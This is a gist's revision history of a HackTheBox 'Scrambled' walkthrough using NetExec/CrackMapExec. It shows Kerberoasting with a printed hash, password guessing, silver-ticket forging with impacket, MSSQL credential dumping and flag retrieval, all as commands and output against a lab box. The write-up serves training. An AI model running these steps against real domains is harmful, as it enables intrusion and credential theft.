-
-
Save affilares/afba76ca7e049e481d3e38b75f3fab6a to your computer and use it in GitHub Desktop.
Revisions
-
mpgn revised this gist
Dec 20, 2023 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -279,4 +279,4 @@ SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Cl For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => part ScrambleClient Reverse ! That's all for me, I hope you learn a bit more about NetExec, for latest news follow me on twitter => [@mpgn_x64](https://twitter.com/mpgn_x64) and follow [@0xdf_](https://twitter.com/0xdf_) for the HTB writeup :) -
Dec 20, 2023 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ Scrambled vs NetExec === Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading [Scrambled](https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html) writeup from [0xdf_](https://twitter.com/0xdf_) when I read this: -
Dec 20, 2023 . 1 changed file with 26 additions and 27 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,18 +1,18 @@ Scrambled vs Crackmapexec === Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading [Scrambled](https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html) writeup from [0xdf_](https://twitter.com/0xdf_) when I read this: > smbclient won’t work, and I wasn’t able to get crackmapexec to work either. To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :) Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` netexec ldap 10.10.11.168 LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` @@ -24,30 +24,30 @@ We can update our /etc/hosts file #### 2. Check if user ksimpson exist ``` netexec ldap DC1.scrm.local -u ksimpson -p blabla LDAP dc1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP dc1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED # with kerberos netexec ldap DC1.scrm.local -u ksimpson -p blabla -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED ``` KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password ;) Also, you may have noticed the **STATUS_NOT_SUPPORTED** without kerberos option, it means NTLM is disabled on the domain, no big deal for NXC ;) #### 3. Checking ksimpson password ``` netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson ``` #### 4. Enumerate shares ``` netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares @@ -69,16 +69,16 @@ User can read "Public" share #### 5. Check files inside Public ``` netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['print$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus cat /tmp/nxc_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6 "Public": { "Network Security Changes.pdf": { "atime_epoch": "2021-11-04 18:23:11", @@ -93,7 +93,7 @@ There is one file: "Network Security Changes.pdf", let's get the file :) #### 6. Getting file "Network Security Changes.pdf" on "Public" share: ``` netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf @@ -103,23 +103,23 @@ SMB DC1.scrm.local 445 DC1.scrm.local [+] File Network Security Ch #### 7. Get Kerberoastable users ``` netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson LDAPS DC1.scrm.local 636 DC1.scrm.local [*] Total of records returned 2 LDAPS DC1.scrm.local 636 DC1.scrm.local sAMAccountName: sqlsvc memberOf: pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547 LDAPS DC1.scrm.local 636 DC1.scrm.local $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$d7519a37a494d59bb728c38677203f9a765440ccc6ab7105f5431c12dc17574fa164bbba88922216d9f2d2b717b7761b7ec449ddcf55b1578807e7d34b97fc1094b68db8ccd8356aa605d6d416cafa0fed51824009008034920a1251bd7f2e1405627f95ebffbbd7863cb7251f581bfdd7128854e6443e1d320af65d263cd6eec7d451b87e80ff611b07cc6fed0fc21b31c6f06a28ac78053c8ad023b4e45c01b8ba196eea2ae4d2e32a575cca0c0b2e25164f4e5b4457c4f630ef4c9d33d1b733dfe32e23548b14afe7748c96011eba7bf3a8bbaf2db500a1e8ffbd4927561969183b3b37ec99400c9e856852b6a62e3580b6129789c96ea8f5df0bb11fc10fd4de7ae0993ec17dd8c967b9cc130fe4aedb33df2a7b6e67816854bda58a3ea4e360ffd0499d54a984a6130dffea7241d8ced5e345ad0e8968b4ff1725825572c5a489ff77d912ed6a9f5dd4bff35e0299cb3b9ad665227d0f104de22bd395a2995c0692286d394e49e6eec1e4db89956c6049b60f697bdbab91eb1b232f047939744bd6b595d396d9a44af7b6dde719a0a1634463217e87137cb90b2cfd0b573406ea25b7c0bddc18a00981e0c84093f29da9f55573e480e7247de386c478345555911362c9de7a2460b0a593f178e125b3c50d376d3f6caadcf78a3493c100f007013923b8d6a13b04b5c44016c4ab36de56030a615d15d22c54b30f4952c5ddcf7b44b792033a3c1dfab7c1d2b5844af0f7e72449fc4cb1fe32a00fc61e77be03cd5dfbcb54e96d7f8cef7826a1ec1f533aef967796e57593cf762b819065b31a99c863f2c36076d62dc0eb6051261ecd5a940ab888ae8fc95dc09c4c3ca0173b414e338699749c7918a89928af702b9ed3a74721adb34c32a3f75a60660ddc0056734da74b824375f3c7cc743332f355955bee4f7dde448d2517ab68dcb8a4a34db2f802cfd98e3eee29bafc8937b99ee0da35c96be4ae77b03bc68b38b6f3b0f010dcaa8a9820ecdc9d86b2e7c111bcfbe9c9df93e0b21283d8b0630dee59dfbb9cfdbf464c18253081aa8832d79756d7bce6a7a0c597cba7b434a078edf70b8c6d774dc3a48761ecad0d391d787360ca33537b8ae3f4d763996f7edb7249d52ccd5fb9d465b7e088c1db7383ba963013c00bfa5c912b8a9d2b432613e68e7b331d1334494dfe57356203e1a3b7b1af1e84fcf56196e48dfd651ae6cb4932d4e057ad288dbf64cbf63490cad7cf427f3ba69066c1f9d597e61cbd9025833c91884a5d6b449ca54a9a75f43f0ebc1bcc0748c70d62e390083f022241cde53a3b056bfc78f245ef08674862d97ca2f7d9ca7b43f4554defceb80f1fe6dbd33ce27da7231ca8376bc5372f2a9e9be07001763850569a0aba4f82d663e1677ec20aec8bda13bda2b8994a7b24d369092e594fbfd23857f7405f08 # checking creds after cracking with Hashcat netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc ``` #### 8. Trying to connect to MSSQL ``` netexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k MSSQL DC1.scrm.local 1433 None [*] None (name:DC1.scrm.local) (domain:scrm.local) MSSQL DC1.scrm.local 1433 None [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc' ``` @@ -129,7 +129,7 @@ User cannot connect to the MSSQL (very strange but i guess it on purpose to expl #### 9. Getting the SID of the domain: ``` netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc LDAPS DC1.scrm.local 636 DC1.scrm.local Domain SID S-1-5-21-2743207045-1827831105-2542523200 @@ -157,15 +157,15 @@ Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corpo [*] Saving ticket in administrator.ccache export KRB5CCNAME=administrator.ccache netexec mssql DC1.scrm.local --use-kcache MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) ``` #### 11. Execute MSSQL query ``` netexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;" MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE LdapUser @@ -176,7 +176,7 @@ MSSQL dc1.scrm.local 1433 NONE MiscSvc MSSQL dc1.scrm.local 1433 NONE ScrambledEggs9900 # checking new creds netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 ``` @@ -188,7 +188,7 @@ We got a new user: #### 12. Getting user flag.txt ``` netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt @@ -198,7 +198,7 @@ MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\miscsvc\ #### 12.bis Getting the root flag using (unatended solution ???) ``` netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt @@ -213,7 +213,7 @@ We have the **root flag** but it seems it is not the end so let's go for the fun #### 13. Getting readable shares for user miscsvc ``` netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares @@ -233,17 +233,16 @@ SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ #### 14. List file inside IT share ``` SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['netlogon', 'public', 'sysvol', 'ipc$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus ┌──(kali㉿kali)-[~/netexec] └─$ cat /tmp/nxc_spider_plus/DC1.scrm.local.json { "IT": { "Apps/Sales Order Client/ScrambleClient.exe": { @@ -271,7 +270,7 @@ SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:Scram SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll -
Nov 9, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -12,7 +12,7 @@ Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` crackmapexec ldap 10.10.11.168 LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` -
Nov 9, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -12,7 +12,7 @@ Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` crackmapexec ldap 10.10.11.168 --no-smb LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` -
Nov 1, 2022 . 1 changed file with 3 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -33,7 +33,7 @@ crackmapexec ldap DC1.scrm.local -u ksimpson -p blabla -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED ``` KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password ;) Also, you may have noticed the **STATUS_NOT_SUPPORTED** without kerberos option, it means NTLM is disabled on the domain, no big deal for CME ;) #### 3. Checking ksimpson password @@ -203,12 +203,12 @@ MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt cat /tmp/root.txt 936c171e740f3009a405919f03a05644 ``` We have the **root flag** but it seems it is not the end so let's go for the fun :) #### 13. Getting readable shares for user miscsvc -
Nov 1, 2022 . 1 changed file with 0 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -9,8 +9,6 @@ To be fair, at the time of his writeup it was true, but not anymore and it's pre Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` -
Nov 1, 2022 . No changes.There are no files selected for viewing
-
Nov 1, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,285 @@ Scrambled vs Crackmapexec === Let pwn the box Scrambled from HackTheBox using only CrackMapExec ! For context, I was reading [Scrambled](https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html) writeup from [0xdf_](https://twitter.com/0xdf_) when I read this: > smbclient won’t work, and I wasn’t able to get crackmapexec to work either. To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with CME, 5 minutes and you get root :) Note: I will pass the web part where we get one username : ksimpson Support: https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html #### 1. Getting domain info ``` crackmapexec ldap 10.10.11.168 LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` - Target: DC1.scrm.local - Domain: scrm.local We can update our /etc/hosts file #### 2. Check if user ksimpson exist ``` crackmapexec ldap DC1.scrm.local -u ksimpson -p blabla LDAP dc1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP dc1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED # with kerberos crackmapexec ldap DC1.scrm.local -u ksimpson -p blabla -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED ``` KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password Also, you may have noticed the **STATUS_NOT_SUPPORTED** without kerberos option, it means NTLM is disabled on the domain, no big deal for CME ;) #### 3. Checking ksimpson password ``` crackmapexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson ``` #### 4. Enumerate shares ``` crackmapexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------ SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share SMB DC1.scrm.local 445 DC1.scrm.local HR SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC SMB DC1.scrm.local 445 DC1.scrm.local IT SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share SMB DC1.scrm.local 445 DC1.scrm.local Public READ SMB DC1.scrm.local 445 DC1.scrm.local Sales SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share ``` User can read "Public" share #### 5. Check files inside Public ``` crackmapexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['print$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/cme_spider_plus cat /tmp/cme_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6 "Public": { "Network Security Changes.pdf": { "atime_epoch": "2021-11-04 18:23:11", "ctime_epoch": "2021-11-04 18:20:49", "mtime_epoch": "2021-11-05 13:45:07", "size": "615.34 KB" } ``` There is one file: "Network Security Changes.pdf", let's get the file :) #### 6. Getting file "Network Security Changes.pdf" on "Public" share: ``` crackmapexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf SMB DC1.scrm.local 445 DC1.scrm.local [+] File Network Security Changes.pdf was transferred to /tmp/Network_Security_Changes.pdf ``` #### 7. Get Kerberoastable users ``` crackmapexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson LDAPS DC1.scrm.local 636 DC1.scrm.local [*] Total of records returned 2 LDAPS DC1.scrm.local 636 DC1.scrm.local sAMAccountName: sqlsvc memberOf: pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547 LDAPS DC1.scrm.local 636 DC1.scrm.local $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$d7519a37a494d59bb728c38677203f9a765440ccc6ab7105f5431c12dc17574fa164bbba88922216d9f2d2b717b7761b7ec449ddcf55b1578807e7d34b97fc1094b68db8ccd8356aa605d6d416cafa0fed51824009008034920a1251bd7f2e1405627f95ebffbbd7863cb7251f581bfdd7128854e6443e1d320af65d263cd6eec7d451b87e80ff611b07cc6fed0fc21b31c6f06a28ac78053c8ad023b4e45c01b8ba196eea2ae4d2e32a575cca0c0b2e25164f4e5b4457c4f630ef4c9d33d1b733dfe32e23548b14afe7748c96011eba7bf3a8bbaf2db500a1e8ffbd4927561969183b3b37ec99400c9e856852b6a62e3580b6129789c96ea8f5df0bb11fc10fd4de7ae0993ec17dd8c967b9cc130fe4aedb33df2a7b6e67816854bda58a3ea4e360ffd0499d54a984a6130dffea7241d8ced5e345ad0e8968b4ff1725825572c5a489ff77d912ed6a9f5dd4bff35e0299cb3b9ad665227d0f104de22bd395a2995c0692286d394e49e6eec1e4db89956c6049b60f697bdbab91eb1b232f047939744bd6b595d396d9a44af7b6dde719a0a1634463217e87137cb90b2cfd0b573406ea25b7c0bddc18a00981e0c84093f29da9f55573e480e7247de386c478345555911362c9de7a2460b0a593f178e125b3c50d376d3f6caadcf78a3493c100f007013923b8d6a13b04b5c44016c4ab36de56030a615d15d22c54b30f4952c5ddcf7b44b792033a3c1dfab7c1d2b5844af0f7e72449fc4cb1fe32a00fc61e77be03cd5dfbcb54e96d7f8cef7826a1ec1f533aef967796e57593cf762b819065b31a99c863f2c36076d62dc0eb6051261ecd5a940ab888ae8fc95dc09c4c3ca0173b414e338699749c7918a89928af702b9ed3a74721adb34c32a3f75a60660ddc0056734da74b824375f3c7cc743332f355955bee4f7dde448d2517ab68dcb8a4a34db2f802cfd98e3eee29bafc8937b99ee0da35c96be4ae77b03bc68b38b6f3b0f010dcaa8a9820ecdc9d86b2e7c111bcfbe9c9df93e0b21283d8b0630dee59dfbb9cfdbf464c18253081aa8832d79756d7bce6a7a0c597cba7b434a078edf70b8c6d774dc3a48761ecad0d391d787360ca33537b8ae3f4d763996f7edb7249d52ccd5fb9d465b7e088c1db7383ba963013c00bfa5c912b8a9d2b432613e68e7b331d1334494dfe57356203e1a3b7b1af1e84fcf56196e48dfd651ae6cb4932d4e057ad288dbf64cbf63490cad7cf427f3ba69066c1f9d597e61cbd9025833c91884a5d6b449ca54a9a75f43f0ebc1bcc0748c70d62e390083f022241cde53a3b056bfc78f245ef08674862d97ca2f7d9ca7b43f4554defceb80f1fe6dbd33ce27da7231ca8376bc5372f2a9e9be07001763850569a0aba4f82d663e1677ec20aec8bda13bda2b8994a7b24d369092e594fbfd23857f7405f08 # checking creds after cracking with Hashcat crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc ``` #### 8. Trying to connect to MSSQL ``` crackmapexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k MSSQL DC1.scrm.local 1433 None [*] None (name:DC1.scrm.local) (domain:scrm.local) MSSQL DC1.scrm.local 1433 None [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc' ``` User cannot connect to the MSSQL (very strange but i guess it on purpose to exploit a [Kerberos Silver Tickets](https://adsecurity.org/?p=2011) which is very cool ! #### 9. Getting the SID of the domain: ``` crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc LDAPS DC1.scrm.local 636 DC1.scrm.local Domain SID S-1-5-21-2743207045-1827831105-2542523200 ``` Notice the automatic switch between **LDAP** and **LDAPS** ! :D #### 10. We generate a ticket and use it with option `--use-kcache` ``` impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for scrm.local/administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncTGSRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncTGSRepPart [*] Saving ticket in administrator.ccache export KRB5CCNAME=administrator.ccache crackmapexec mssql DC1.scrm.local --use-kcache MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) ``` #### 11. Execute MSSQL query ``` crackmapexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;" MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE LdapUser MSSQL dc1.scrm.local 1433 NONE LdapPwd MSSQL dc1.scrm.local 1433 NONE -------------------------------------------------- MSSQL dc1.scrm.local 1433 NONE -------------------------------------------------- MSSQL dc1.scrm.local 1433 NONE MiscSvc MSSQL dc1.scrm.local 1433 NONE ScrambledEggs9900 # checking new creds crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k 